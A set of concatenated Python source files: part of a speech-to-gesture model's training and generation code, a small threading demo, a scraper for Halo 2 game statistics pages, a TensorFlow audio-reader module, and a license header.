self.best_s2eg_loss_epoch = self.meta_info['epoch']
self.s2eg_loss_updated = True
else:
self.s2eg_loss_updated = False
self.show_epoch_info()
self.io.print_timer()
def train(self):
trimodal_checkpoint = torch.load(jn(self.base_path, 'outputs', 'trimodal_gen.pth.tar'))
self.trimodal_generator.load_state_dict(trimodal_checkpoint['trimodal_gen_dict'])
if self.args.s2eg_load_last_best:
s2eg_model_found = self.load_model_at_epoch(epoch=self.args.s2eg_start_epoch)
            if not s2eg_model_found and self.args.s2eg_start_epoch != 'best':
                print('Warning! Trying to load best known model for s2eg instead of epoch {}: '.format(
                    self.args.s2eg_start_epoch), end='')
s2eg_model_found = self.load_model_at_epoch(epoch='best')
self.args.s2eg_start_epoch = self.best_s2eg_loss_epoch if s2eg_model_found else 0
print('loaded.')
if not s2eg_model_found:
print('Warning! Starting at epoch 0')
self.args.s2eg_start_epoch = 0
else:
self.args.s2eg_start_epoch = 0
for epoch in range(self.args.s2eg_start_epoch, self.args.s2eg_num_epoch):
self.meta_info['epoch'] = epoch
# training
self.io.print_log('S2EG training epoch: {}'.format(epoch))
self.per_train_epoch()
self.io.print_log('Done.')
# validation
            if (epoch % self.args.val_interval == 0) or (
                    epoch + 1 == self.args.s2eg_num_epoch):
self.io.print_log('S2EG val epoch: {}'.format(epoch))
self.per_val_epoch()
self.io.print_log('Done.')
# save model and weights
if self.s2eg_loss_updated or (epoch % self.args.save_interval == 0 and epoch > self.min_train_epochs):
torch.save({'gen_model_dict': self.s2eg_generator.state_dict(),
'dis_model_dict': self.s2eg_discriminator.state_dict()},
jn(self.args.work_dir_s2eg, 'epoch_{}_loss_{:.4f}_model.pth.tar'.
format(epoch, self.epoch_info['mean_s2eg_loss'])))
def generate_gestures(self, samples_to_generate=10, randomized=True, load_saved_model=True,
s2eg_epoch='best', make_video=False, calculate_metrics=True):
if load_saved_model:
s2eg_model_found = self.load_model_at_epoch(epoch=s2eg_epoch)
            assert s2eg_model_found, 'Speech to emotive gestures model not found'
trimodal_checkpoint = torch.load(jn(self.base_path, 'outputs', 'trimodal_gen.pth.tar'))
self.trimodal_generator.load_state_dict(trimodal_checkpoint['trimodal_gen_dict'])
self.trimodal_generator.eval()
self.s2eg_generator.eval()
self.s2eg_discriminator.eval()
batch_size = 2048
losses_all_trimodal = AverageMeter('loss')
joint_mae_trimodal = AverageMeter('mae_on_joint')
accel_trimodal = AverageMeter('accel')
losses_all = AverageMeter('loss')
joint_mae = AverageMeter('mae_on_joint')
accel = AverageMeter('accel')
start_time = time.time()
for sample_idx in np.arange(0, samples_to_generate, batch_size):
samples_curr = np.arange(sample_idx, sample_idx + min(batch_size, samples_to_generate - sample_idx))
words, aux_info, word_seq_tensor, word_seq_lengths, extended_word_seq, \
pose_seq, vec_seq, target_seq, audio, spectrogram, mfcc_features, vid_indices = \
self.return_batch(samples_curr, randomized=randomized)
with torch.no_grad():
loss_dict, losses_all_trimodal, joint_mae_trimodal,\
accel_trimodal, losses_all, joint_mae, accel = \
self.forward_pass_s2eg(extended_word_seq, audio, mfcc_features,
vec_seq, vid_indices, train=False,
target_seq=target_seq, words=words, aux_info=aux_info,
save_path=self.args.video_save_path,
make_video=make_video, calculate_metrics=calculate_metrics,
losses_all_trimodal=losses_all_trimodal,
joint_mae_trimodal=joint_mae_trimodal, accel_trimodal=accel_trimodal,
losses_all=losses_all, joint_mae=joint_mae, accel=accel)
end_idx = min(samples_to_generate, sample_idx + batch_size)
# print metrics
loss_dict = {'loss_trimodal': losses_all_trimodal.avg, 'joint_mae_trimodal': joint_mae_trimodal.avg,
'loss': losses_all.avg, 'joint_mae': joint_mae.avg}
elapsed_time = time.time() - start_time
if self.evaluator_trimodal and self.evaluator_trimodal.get_no_of_samples() > 0:
frechet_dist_trimodal, feat_dist_trimodal = self.evaluator_trimodal.get_scores()
print('[VAL Trimodal]\tloss: {:.3f}, joint mae: {:.5f}, accel diff: {:.5f},'
'FGD: {:.3f}, feat_D: {:.3f} / {:.1f}s'.format(losses_all_trimodal.avg,
joint_mae_trimodal.avg, accel_trimodal.avg,
frechet_dist_trimodal, feat_dist_trimodal,
elapsed_time))
loss_dict['frechet_trimodal'] = frechet_dist_trimodal
loss_dict['feat_dist_trimodal'] = feat_dist_trimodal
else:
print('[VAL Trimodal]\tloss: {:.3f}, joint mae: {:.3f} / {:.1f}s'.format(losses_all_trimodal.avg,
joint_mae_trimodal.avg,
elapsed_time))
if self.evaluator and self.evaluator.get_no_of_samples() > 0:
frechet_dist, feat_dist = self.evaluator.get_scores()
print('[VAL Ours]\t\tloss: {:.3f}, joint mae: {:.5f}, accel diff: {:.5f},'
'FGD: {:.3f}, feat_D: {:.3f} / {:.1f}s'.format(losses_all.avg, joint_mae.avg, accel.avg,
frechet_dist, feat_dist, elapsed_time))
loss_dict['frechet'] = frechet_dist
loss_dict['feat_dist'] = feat_dist
else:
print('[VAL Ours]\t\tloss: {:.3f}, joint mae: {:.3f} / {:.1f}s'.format(losses_all.avg,
joint_mae.avg,
elapsed_time))
end_time = time.time()
print('Total time taken: {:.2f} seconds.'.format(end_time - start_time))
def generate_gestures_by_dataset(self, dataset, data_params,
randomized=True, fade_out=False,
load_saved_model=True, s2eg_epoch='best',
make_video=False, save_pkl=False):
if load_saved_model:
s2eg_model_found = self.load_model_at_epoch(epoch=s2eg_epoch)
            assert s2eg_model_found, 'Speech to emotive gestures model not found'
trimodal_checkpoint = torch.load(jn(self.base_path, 'outputs', 'trimodal_gen.pth.tar'))
self.trimodal_generator.load_state_dict(trimodal_checkpoint['trimodal_gen_dict'])
self.trimodal_generator.eval()
self.s2eg_generator.eval()
self.s2eg_discriminator.eval()
mean_dir_vec = np.squeeze(np.array(self.s2eg_config_args.mean_dir_vec))
losses_all_trimodal = AverageMeter('loss')
joint_mae_trimodal = AverageMeter('mae_on_joint')
accel_trimodal = AverageMeter('accel')
losses_all = AverageMeter('loss')
joint_mae = AverageMeter('mae_on_joint')
accel = AverageMeter('accel')
overall_start_time = time.time()
if dataset.lower() == 'ted_db':
if 'clip_duration_range' not in data_params.keys():
data_params['clip_duration_range'] = [5, 12]
lmdb_env = lmdb.open(data_params['env_file'], readonly=True, lock=False)
with lmdb_env.begin(write=False) as txn:
keys = [key for key, _ in txn.cursor()]
samples_to_generate = len(keys)
print('Total samples to generate: {}'.format(samples_to_generate))
for sample_idx in range(samples_to_generate): # loop until we get the desired number of results
start_time = time.time()
# select video
if randomized:
key = np.random.choice(keys)
else:
key = keys[sample_idx]
buf = txn.get(key)
video = pyarrow.deserialize(buf)
vid_name = video['vid']
clips = video['clips']
n_clips = len(clips)
if n_clips == 0:
continue
if randomized:
clip_idx = np.random.randint(0, n_clips)
vid_idx = np.random.randint(0, self.test_speaker_model.n_words)
else:
clip_idx = 0
vid_idx = 0
clip_poses = clips[clip_idx]['skeletons_3d']
clip_audio = clips[clip_idx]['audio_raw']
clip_words = clips[clip_idx]['words']
clip_time = [clips[clip_idx]['start_time'], clips[clip_idx]['end_time']]
clip_poses = resample_pose_seq(clip_poses, clip_time[1] - clip_time[0],
self.s2eg_config_args.motion_resampling_framerate)
target_dir_vec = convert_pose_seq_to_dir_vec(clip_poses)
target_dir_vec = target_dir_vec.reshape(target_dir_vec.shape[0], -1)
target_dir_vec -= mean_dir_vec
n_frames_total = len(target_dir_vec)
# check duration
clip_duration = clip_time[1] - clip_time[0]
if clip_duration < data_params['clip_duration_range'][0] or\
clip_duration > data_params['clip_duration_range'][1]:
continue
# synthesize
for selected_vi in range(len(clip_words)): # make start time of input text zero
clip_words[selected_vi][1] -= clip_time[0] # start time
clip_words[selected_vi][2] -= clip_time[0] # end time
out_list_trimodal = []
out_list = []
n_frames = self.s2eg_config_args.n_poses
clip_length = len(clip_audio) / data_params['audio_sr']
seed_seq = target_dir_vec[0:self.s2eg_config_args.n_pre_poses]
# pre seq
pre_seq_trimodal = torch.zeros((1, n_frames, self.pose_dim + 1))
if seed_seq is not None:
pre_seq_trimodal[0, 0:self.s2eg_config_args.n_pre_poses, :-1] = \
torch.Tensor(seed_seq[0:self.s2eg_config_args.n_pre_poses])
# indicating bit for seed poses
pre_seq_trimodal[0, 0:self.s2eg_config_args.n_pre_poses, -1] = 1
pre_seq = torch.zeros((1, n_frames, self.pose_dim + 1))
if seed_seq is not None:
pre_seq[0, 0:self.s2eg_config_args.n_pre_poses, :-1] = \
torch.Tensor(seed_seq[0:self.s2eg_config_args.n_pre_poses])
# indicating bit for seed poses
pre_seq[0, 0:self.s2eg_config_args.n_pre_poses, -1] = 1
# target seq
target_seq = torch.from_numpy(target_dir_vec[0:n_frames]).unsqueeze(0).float().to(self.device)
spectrogram = None
# divide into synthesize units and do synthesize
unit_time = self.s2eg_config_args.n_poses / \
self.s2eg_config_args.motion_resampling_framerate
stride_time = (self.s2eg_config_args.n_poses - self.s2eg_config_args.n_pre_poses) / \
self.s2eg_config_args.motion_resampling_framerate
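                    # Each synthesis unit covers n_poses frames; consecutive units advance by
                    # (n_poses - n_pre_poses) frames, and the first n_pre_poses frames of a unit
                    # are seeded from the end of the previous unit's output.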
if clip_length < unit_time:
num_subdivisions = 1
else:
num_subdivisions = math.ceil((clip_length - unit_time) / stride_time)
spectrogram_sample_length = int(round(unit_time * data_params['audio_sr'] / 512))
audio_sample_length = int(unit_time * data_params['audio_sr'])
end_padding_duration = 0
# prepare speaker input
if self.s2eg_config_args.z_type == 'speaker':
if vid_idx is None:
vid_idx = np.random.randint(0, self.s2eg_generator.z_obj.n_words)
print('vid idx:', vid_idx)
vid_idx = torch.LongTensor([vid_idx]).to(self.device)
else:
vid_idx = None
print('Sample {} of {}'.format(sample_idx + 1, samples_to_generate))
print('Subdivisions\t|\tUnit Time\t|\tClip Length\t|\tStride Time\t|\tAudio Sample Length')
print('{}\t\t\t\t|\t{:.4f}\t\t|\t{:.4f}\t\t|\t{:.4f}\t\t|\t{}'.
format(num_subdivisions, unit_time, clip_length,
stride_time, audio_sample_length))
out_dir_vec_trimodal = None
out_dir_vec = None
for sub_div_idx in range(0, num_subdivisions):
                        # start of this synthesis unit within the clip, in seconds
                        sub_div_start_time = sub_div_idx * stride_time
                        end_time = sub_div_start_time + unit_time
# prepare spectrogram input
in_spec = None
# prepare audio input
                        audio_start = math.floor(sub_div_start_time / clip_length * len(clip_audio))
audio_end = audio_start + audio_sample_length
in_audio_np = clip_audio[audio_start:audio_end]
if len(in_audio_np) < audio_sample_length:
if sub_div_idx == num_subdivisions - 1:
end_padding_duration = audio_sample_length - len(in_audio_np)
in_audio_np = np.pad(in_audio_np, (0, audio_sample_length - len(in_audio_np)),
'constant')
in_mfcc = torch.from_numpy(mfcc(in_audio_np, sr=16000, n_mfcc=self.num_mfcc) / 1000.).\
unsqueeze(0).to(self.device).float()
in_audio = torch.from_numpy(in_audio_np).unsqueeze(0).to(self.device).float()
# prepare text input
                        word_seq = DataPreprocessor.get_words_in_time_range(word_list=clip_words,
                                                                            start_time=sub_div_start_time,
                                                                            end_time=end_time)
extended_word_indices = np.zeros(n_frames) # zero is the index of padding token
word_indices = np.zeros(len(word_seq) + 2)
word_indices[0] = self.lang_model.SOS_token
word_indices[-1] = self.lang_model.EOS_token
                        frame_duration = (end_time - sub_div_start_time) / n_frames
print('Subdivision {} of {}. Words: '.format(sub_div_idx + 1, num_subdivisions), end='')
for w_i, word in enumerate(word_seq):
print(word[0], end=', ')
                            idx = max(0, int(np.floor((word[1] - sub_div_start_time) / frame_duration)))
extended_word_indices[idx] = self.lang_model.get_word_index(word[0])
word_indices[w_i + 1] = self.lang_model.get_word_index(word[0])
print('\b\b', end='.\n')
in_text_padded = torch.LongTensor(extended_word_indices).unsqueeze(0).to(self.device)
in_text = torch.LongTensor(word_indices).unsqueeze(0).to(self.device)
# prepare target seq and pre seq
if sub_div_idx > 0:
target_seq = torch.zeros_like(out_dir_vec)
start_idx = n_frames * (sub_div_idx - 1)
end_idx = min(n_frames_total, n_frames * sub_div_idx)
target_seq[0, :(end_idx - start_idx)] = torch.from_numpy(
target_dir_vec[start_idx:end_idx]) \
.unsqueeze(0).float().to(self.device)
pre_seq_trimodal[0, 0:self.s2eg_config_args.n_pre_poses, :-1] = \
out_dir_vec_trimodal.squeeze(0)[-self.s2eg_config_args.n_pre_poses:]
# indicating bit for constraints
pre_seq_trimodal[0, 0:self.s2eg_config_args.n_pre_poses, -1] = 1
pre_seq[0, 0:self.s2eg_config_args.n_pre_poses, :-1] = \
out_dir_vec.squeeze(0)[-self.s2eg_config_args.n_pre_poses:]
# indicating bit for constraints
pre_seq[0, 0:self.s2eg_config_args.n_pre_poses, -1] = 1
pre_seq_trimodal = pre_seq_trimodal.float().to(self.device)
pre_seq = pre_seq.float().to(self.device)
out_dir_vec_trimodal, *_ = self.trimodal_generator(pre_seq_trimodal,
in_text_padded, in_audio, vid_idx)
out_dir_vec, *_ = self.s2eg_generator(pre_seq, in_text_padded, in_mfcc, vid_idx)
self.evaluator_trimodal, losses_all_trimodal, joint_mae_trimodal, accel_trimodal = \
Processor.push_samples(self.evaluator_trimodal, target_seq, out_dir_vec_trimodal,
in_text, in_audio, losses_all_trimodal, joint_mae_trimodal,
accel_trimodal,
self.s2eg_config_args.mean_dir_vec,
self.s2eg_config_args.n_poses,
self.s2eg_config_args.n_pre_poses)
self.evaluator, losses_all, joint_mae, accel = \
Processor.push_samples(self.evaluator, target_seq, out_dir_vec,
in_text, in_audio, losses_all, joint_mae, accel,
self.s2eg_config_args.mean_dir_vec,
self.s2eg_config_args.n_poses,
self.s2eg_config_args.n_pre_poses)
out_seq_trimodal = out_dir_vec_trimodal[0, :, :].data.cpu().numpy()
out_seq = out_dir_vec[0, :, :].data.cpu().numpy()
# smoothing motion transition
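                        # The n_pre_poses frames that overlap with the previous unit are blended linearly:
                        # frame j takes weight (n - j) / (n + 1) from the previous unit's pose and
                        # (j + 1) / (n + 1) from the newly generated one.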
if len(out_list_trimodal) > 0:
last_poses = out_list_trimodal[-1][-self.s2eg_config_args.n_pre_poses:]
# delete last 4 frames
out_list_trimodal[-1] = out_list_trimodal[-1][:-self.s2eg_config_args.n_pre_poses]
for j in range(len(last_poses)):
n = len(last_poses)
prev_pose = last_poses[j]
next_pose = out_seq_trimodal[j]
out_seq_trimodal[j] = prev_pose * (n - j) / (n + 1) +\
next_pose * (j + 1) / (n + 1)
out_list_trimodal.append(out_seq_trimodal)
if len(out_list) > 0:
last_poses = out_list[-1][-self.s2eg_config_args.n_pre_poses:]
# delete last 4 frames
out_list[-1] = out_list[-1][:-self.s2eg_config_args.n_pre_poses]
for j in range(len(last_poses)):
n = len(last_poses)
prev_pose = last_poses[j]
next_pose = out_seq[j]
out_seq[j] = prev_pose * (n - j) / (n + 1) + next_pose * (j + 1) / (n + 1)
out_list.append(out_seq)
# aggregate results
out_dir_vec_trimodal = np.vstack(out_list_trimodal)
out_dir_vec = np.vstack(out_list)
# fade out to the mean pose
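                    # The tail corresponding to the padded audio is zeroed (the mean pose in the
                    # mean-removed representation) and then re-fitted with a degree-2 polynomial whose
                    # endpoints are weighted 5x, so the motion eases into the mean pose instead of jumping.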
if fade_out:
n_smooth = self.s2eg_config_args.n_pre_poses
start_frame = len(out_dir_vec_trimodal) - \
int(end_padding_duration / data_params['audio_sr']
* self.s2eg_config_args.motion_resampling_framerate)
end_frame = start_frame + n_smooth * 2
if len(out_dir_vec_trimodal) < end_frame:
out_dir_vec_trimodal = np.pad(out_dir_vec_trimodal,
[(0, end_frame - len(out_dir_vec_trimodal)), (0, 0)],
mode='constant')
out_dir_vec_trimodal[end_frame - n_smooth:] = \
np.zeros(self.pose_dim) # fade out to mean poses
n_smooth = self.s2eg_config_args.n_pre_poses
start_frame = len(out_dir_vec) - \
int(end_padding_duration /
data_params['audio_sr'] * self.s2eg_config_args.motion_resampling_framerate)
end_frame = start_frame + n_smooth * 2
if len(out_dir_vec) < end_frame:
out_dir_vec = np.pad(out_dir_vec, [(0, end_frame - len(out_dir_vec)), (0, 0)],
mode='constant')
out_dir_vec[end_frame - n_smooth:] = \
np.zeros(self.pose_dim) # fade out to mean poses
# interpolation
y_trimodal = out_dir_vec_trimodal[start_frame:end_frame]
y = out_dir_vec[start_frame:end_frame]
x = np.array(range(0, y.shape[0]))
w = np.ones(len(y))
w[0] = 5
w[-1] = 5
co_effs_trimodal = np.polyfit(x, y_trimodal, 2, w=w)
fit_functions_trimodal = [np.poly1d(co_effs_trimodal[:, k])
for k in range(0, y_trimodal.shape[1])]
interpolated_y_trimodal = [fit_functions_trimodal[k](x)
for k in range(0, y_trimodal.shape[1])]
# (num_frames x dims)
interpolated_y_trimodal = np.transpose(np.asarray(interpolated_y_trimodal))
co_effs = np.polyfit(x, y, 2, w=w)
fit_functions = [np.poly1d(co_effs[:, k]) for k in range(0, y.shape[1])]
interpolated_y = [fit_functions[k](x) for k in range(0, y.shape[1])]
# (num_frames x dims)
interpolated_y = np.transpose(np.asarray(interpolated_y))
out_dir_vec_trimodal[start_frame:end_frame] = interpolated_y_trimodal
out_dir_vec[start_frame:end_frame] = interpolated_y
                    # build the sentence and file name prefix here, since both the video rendering
                    # and the pkl saving below rely on them
                    sentence_words = []
                    for word, _, _ in clip_words:
                        sentence_words.append(word)
                    sentence = ' '.join(sentence_words)
                    filename_prefix = '{}_{}_{}'.format(vid_name, vid_idx, clip_idx)
                    # make a video
                    if make_video:
                        filename_prefix_for_video = filename_prefix
aux_str = '({}, time: {}-{})'.format(vid_name,
str(datetime.timedelta(seconds=clip_time[0])),
str(datetime.timedelta(seconds=clip_time[1])))
create_video_and_save(
self.args.video_save_path, 0, filename_prefix_for_video, 0, target_dir_vec,
out_dir_vec_trimodal, out_dir_vec, mean_dir_vec, sentence,
audio=clip_audio, aux_str=aux_str, clipping_to_shortest_stream=True,
delete_audio_file=False)
print('Rendered {} of {} videos. Last one took {:.2f} seconds.'.
format(sample_idx + 1, samples_to_generate, time.time() - start_time))
# save pkl
if save_pkl:
out_dir_vec_trimodal = out_dir_vec_trimodal + mean_dir_vec
out_poses_trimodal = convert_dir_vec_to_pose(out_dir_vec_trimodal)
save_dict = {
'sentence': sentence, 'audio': clip_audio.astype(np.float32),
'out_dir_vec': out_dir_vec_trimodal, 'out_poses': out_poses_trimodal,
'aux_info': '{}_{}_{}'.format(vid_name, vid_idx, clip_idx),
'human_dir_vec': target_dir_vec + mean_dir_vec,
}
with open(jn(self.args.video_save_path,
'{}_trimodal.pkl'.format(filename_prefix)), 'wb') as f:
pickle.dump(save_dict, f)
out_dir_vec = out_dir_vec + mean_dir_vec
out_poses = convert_dir_vec_to_pose(out_dir_vec)
save_dict = {
'sentence': sentence, 'audio': clip_audio.astype(np.float32),
'out_dir_vec': out_dir_vec, 'out_poses': out_poses,
'aux_info': '{}_{}_{}'.format(vid_name, vid_idx, clip_idx),
'human_dir_vec': target_dir_vec + mean_dir_vec,
}
with open(jn(self.args.video_save_path,
'{}.pkl'.format(filename_prefix)), 'wb') as f:
pickle.dump(save_dict, f)
# print metrics
loss_dict = {'loss': losses_all.avg, 'joint_mae': joint_mae.avg}
elapsed_time = time.time() - start_time
if self.evaluator_trimodal and self.evaluator_trimodal.get_no_of_samples() > 0:
frechet_dist_trimodal, feat_dist_trimodal = self.evaluator_trimodal.get_scores()
print('[VAL Trimodal]\tloss: {:.3f}, joint mae: {:.5f}, accel diff: {:.5f},'
'FGD: {:.3f}, feat_D: {:.3f} / {:.1f}s'.format(losses_all_trimodal.avg,
joint_mae_trimodal.avg,
accel_trimodal.avg,
frechet_dist_trimodal,
feat_dist_trimodal,
elapsed_time))
loss_dict['frechet_trimodal'] = frechet_dist_trimodal
loss_dict['feat_dist_trimodal'] = feat_dist_trimodal
else:
print('[VAL Trimodal]\tloss: {:.3f}, joint mae: {:.3f} / {:.1f}s'.format(losses_all_trimodal.avg,
joint_mae_trimodal.avg,
elapsed_time))
if self.evaluator and self.evaluator.get_no_of_samples() > 0:
frechet_dist, feat_dist = self.evaluator.get_scores()
print('[VAL Ours]\t\tloss: {:.3f}, joint mae: {:.5f}, accel diff: {:.5f},'
'FGD: {:.3f}, feat_D: {:.3f} / {:.1f}s'.format(losses_all.avg, joint_mae.avg, accel.avg,
frechet_dist, feat_dist, elapsed_time))
loss_dict['frechet'] = frechet_dist
loss_dict['feat_dist'] = feat_dist
else:
print('[VAL Ours]\t\tloss: {:.3f}, joint mae: {:.3f} / {:.1f}s'.format(losses_all.avg,
joint_mae.avg,
elapsed_time))
end_time = time.time()
print('Total time taken: {:.2f} seconds.'.format(end_time - overall_start_time))
|
thread1.py
|
import threading
import time
# Example of a function that takes no parameters
def funcao():
for i in range(3):
print(i, 'Executando a Thread!')
time.sleep(0.5)
print('Iniciando o programa!')
threading.Thread(target=funcao).start()  # target takes the function to run; .start() launches the thread
print('\nFinalizando...')
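# A variation (sketch, not part of the original example): keep a reference to the thread
# and call join() so the final print only runs after the worker has finished.
#   t = threading.Thread(target=funcao)
#   t.start()
#   t.join()  # blocks until funcao returns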
|
halo2_after_purge.py
|
import json
import os
import multiprocessing
import threading
import urllib.request
from bs4 import BeautifulSoup
from multiprocessing.pool import ThreadPool
def get_metadata(metadata):
gametype, mapname, playlist, date, time = \
None, None, None, None, None
for line in metadata.text.split('\n'):
line = line.strip()
if line.find(" on ") != -1:
gametype = line[:line.find(" on")]
mapname = line[line.find("n ") + 2:]
elif line.find('-') != -1:
playlist = line[line.find('- ') + 2:]
elif line.find(',') != -1:
date = line[:line.find(',')]
time = line[line.find(',') + 2:]
return gametype, mapname, playlist, date, time
def get_team_data(carnage_rows):
teams = dict()
ranked = dict()
has_teams = False
last_team = None
columns = None
for i in range(len(carnage_rows)):
total_row = []
row = carnage_rows[i]
cols = row.find_all("td")
for col in cols:
text = col.text.strip()
if text == "K/D Spread":
text = "Spread"
total_row.append(text)
exp_bar = col.find("div", {"class": "ExpBar"})
if exp_bar is not None:
# Extract progress to next rank from expbar style attribute
style = exp_bar.find("span").get("style")
progress = style[style.find(':') + 1:style.find("px")]
ranked[total_row[0][:total_row[0].find('\n')]] = str(int(progress) * 2.5)
        if i == 0:
columns = total_row
else:
is_team = False
for j in range(len(columns)):
# Identify this column's attribute and add to appropriate target
col_name = columns[j]
item = total_row[j]
player_newline_indent = total_row[0].find('\n')
if col_name == "Players":
# Every name in here is either a team name or a gamertag
if item == "Red Team" or item == "Blue Team" or item == "Green Team" \
or item == "Orange Team" or item == "Brown Team" or item == "Yellow Team" \
or item == "Pink Team":
# All possible team names (If there's an 8th, I haven't found it)
last_team = item
has_teams = True
is_team = True
teams[item] = dict()
teams[item]["players"] = dict()
elif has_teams:
if player_newline_indent != -1:
# Indicates that this was a ranked game
# Player\nRank
player = item[:player_newline_indent]
rank = item[player_newline_indent + 1:]
teams[last_team]["players"][player] = dict()
teams[last_team]["players"][player]["rank"] = rank
teams[last_team]["players"][player]["progress"] = ranked[player]
else:
# Check for guests (not allowed in ranked play)
# All guests are reported as Gamertag(G), even if multiple
# Append number for additional guests (should only be 2, 3, or 4)
if item not in teams[last_team]["players"]:
teams[last_team]["players"][item] = dict()
else:
number = 2
item_copy = item + '(' + str(number) + ')'
while item_copy in teams[last_team]["players"]:
number += 1
item_copy = item + '(' + str(number) + ')'
item = item_copy
total_row[j] = item
teams[last_team]["players"][item] = dict()
else:
# FFA ranked game
if player_newline_indent != -1:
player = item[:player_newline_indent]
rank = item[player_newline_indent + 1:]
teams[player] = dict()
teams[player]["rank"] = rank
teams[player]["progress"] = ranked[player]
else:
teams[item] = dict()
elif has_teams and not is_team:
# Assign attribute to player, located in team dict
if player_newline_indent != -1:
teams[last_team]["players"][total_row[0][:player_newline_indent]][col_name.lower()] = item
else:
teams[last_team]["players"][total_row[0]][col_name.lower()] = item
else:
# Free for all game
if player_newline_indent != -1:
teams[total_row[0][:player_newline_indent]][col_name.lower()] = item
else:
teams[total_row[0]][col_name.lower()] = item
return teams, has_teams
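# Illustrative shape of the returned data: for team games,
#   teams = {"Red Team": {"players": {"SomeGamertag": {"rank": "30", "kills": "12", ...}}}, ...}
# while for FFA games each gamertag maps directly to its stat dict; has_teams tells the two apart.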
def get_data(game_id):
url = 'http://halo.bungie.net/Stats/GameStatsHalo2.aspx?gameid=' + str(game_id)
page = urllib.request.urlopen(url)
soup = BeautifulSoup(page, "html.parser")
pool = multiprocessing.pool.ThreadPool(2)
output = dict()
output["id"] = str(game_id)
# The carnage tab essentially has all the remaining data
carnage_rows = soup.find("div", {"id": "ctl00_mainContent_bnetpgd_pnlKills"}) \
.find("table", {"class": "stats"}).find_all("tr")
async_team_data = pool.apply_async(get_team_data, [carnage_rows])
# Get information about the map, gametype, playlist, and other metadata
metadata = soup.find("div", {"class": "stats_overview"})\
.find("ul", {"class": "summary"})
async_metadata = pool.apply_async(get_metadata, [metadata])
gametype, mapname, playlist, date, time = async_metadata.get()
output["gametype"] = gametype
output["map"] = mapname
output["playlist"] = playlist
output["date"] = date
output["time"] = time
teams, has_teams = async_team_data.get()
# JSON tag based on if team game or FFA
if has_teams:
output["teams"] = teams
else:
output["players"] = teams
with open("halo_2_game_" + str(game_id) + ".json", 'w') as file:
json.dump(output, file)
stdio_lock = threading.Lock()
def work(start, end):
started = False
for i in range(start, end):
if started:
try:
get_data(i)
except Exception as e:
stdio_lock.acquire()
print(str(os.getpid()) + ": " + str(e))
stdio_lock.release()
continue
elif i not in generated:
if not started:
stdio_lock.acquire()
print(str(os.getpid()) + " starting at " + str(i))
stdio_lock.release()
started = True
try:
get_data(i)
except Exception as e:
stdio_lock.acquire()
print(str(os.getpid()) + ": " + str(e))
stdio_lock.release()
continue
START = 6066
END = 803138050
SUM = END-START
WORK_PER_THREAD = int(SUM / 24)
'''
file_list = os.listdir("E:/Halo 2 Data/")
generated = set()
for file in file_list:
file = file[file.rfind('_')+1:file.find('.')]
generated.add(int(file))
st = START
for i in range(24):
t = multiprocessing.Process(target=work, args=[st, st + WORK_PER_THREAD])
t.start()
st += WORK_PER_THREAD
main_thread = threading.current_thread()
for t in threading.enumerate():
if t is not main_thread:
t.join()
'''
get_data(803000000)
|
audio_reader.py
|
import fnmatch
import os
import re
import threading
import librosa
import numpy as np
import tensorflow as tf
def find_files(directory, pattern='*.wav'):
'''Recursively finds all files matching the pattern.'''
files = []
for root, dirnames, filenames in os.walk(directory):
for filename in fnmatch.filter(filenames, pattern):
files.append(os.path.join(root, filename))
return files
def load_generic_audio(directory, sample_rate):
'''Generator that yields audio waveforms from the directory.'''
files = find_files(directory)
for filename in files:
audio, _ = librosa.load(filename, sr=sample_rate, mono=True)
audio = audio.reshape(-1, 1)
yield audio, filename
def load_vctk_audio(directory, sample_rate):
'''Generator that yields audio waveforms from the VCTK dataset, and
additionally the ID of the corresponding speaker.'''
files = find_files(directory)
speaker_re = re.compile(r'p([0-9]+)_([0-9]+)\.wav')
for filename in files:
audio, _ = librosa.load(filename, sr=sample_rate, mono=True)
audio = audio.reshape(-1, 1)
matches = speaker_re.findall(filename)[0]
speaker_id, recording_id = [int(id_) for id_ in matches]
yield audio, speaker_id
def trim_silence(audio, threshold=0.3):
'''Removes silence at the beginning and end of a sample.'''
energy = librosa.feature.rmse(audio)
frames = np.nonzero(energy > threshold)
indices = librosa.core.frames_to_samples(frames)[1]
# Note: indices can be an empty array, if the whole audio was silence.
return audio[indices[0]:indices[-1]] if indices.size else audio[0:0]
class AudioReader(object):
'''Generic background audio reader that preprocesses audio files
and enqueues them into a TensorFlow queue.'''
def __init__(self,
audio_dir,
coord,
sample_rate,
sample_size=None,
queue_size=256):
self.audio_dir = audio_dir
self.sample_rate = sample_rate
self.coord = coord
self.sample_size = sample_size
self.threads = []
self.sample_placeholder = tf.placeholder(dtype=tf.float32, shape=None)
self.queue = tf.PaddingFIFOQueue(queue_size,
['float32'],
shapes=[(None, 1)])
self.enqueue = self.queue.enqueue([self.sample_placeholder])
def dequeue(self, num_elements):
output = self.queue.dequeue_many(num_elements)
return output
def thread_main(self, sess):
buffer_ = np.array([])
stop = False
# Go through the dataset multiple times
while not stop:
iterator = load_generic_audio(self.audio_dir, self.sample_rate)
for audio, filename in iterator:
if self.coord.should_stop():
self.stop_threads()
stop = True
break
                # Remove silence; trim_silence works on the 1-D signal, so restore the
                # (n_samples, 1) shape that the padding queue expects afterwards
                audio = trim_silence(audio[:, 0])
                audio = audio.reshape(-1, 1)
if audio.size == 0:
print("[!] {} was ignored as it only contains silence. \n"
" Consider decreasing trim_silence threshold, or adjust volume "
"of the audio.".format(filename))
if self.sample_size:
# Cut samples into fixed size pieces
buffer_ = np.append(buffer_, audio)
while len(buffer_) > self.sample_size:
piece = np.reshape(buffer_[:self.sample_size], [-1, 1])
sess.run(self.enqueue,
feed_dict={self.sample_placeholder: piece})
buffer_ = buffer_[self.sample_size:]
else:
sess.run(self.enqueue,
feed_dict={self.sample_placeholder: audio})
    def stop_threads(self):
        # Worker threads poll coord.should_stop() in thread_main, so asking the
        # coordinator to stop is enough; threading.Thread has no stop() method.
        self.coord.request_stop()
def start_threads(self, sess, n_threads=1):
for _ in range(n_threads):
thread = threading.Thread(target=self.thread_main, args=(sess,))
thread.daemon = True # Thread will close when parent quits.
thread.start()
self.threads.append(thread)
return self.threads
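# Minimal usage sketch (assumptions: a TF1-style session and a local 'wav_dir' of .wav files;
# the names below are illustrative and not part of this module):
#   coord = tf.train.Coordinator()
#   reader = AudioReader('wav_dir', coord, sample_rate=16000, sample_size=100000)
#   batch = reader.dequeue(num_elements=1)
#   with tf.Session() as sess:
#       threads = reader.start_threads(sess)
#       audio_batch = sess.run(batch)
#       coord.request_stop()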
|
views.py
|
# Copyright: (c) OpenSpug Organization. https://github.com/openspug/spug
# Copyright: (c) <spug.dev@gmail.com>
# Released under the MIT License.
from django.views.generic import View
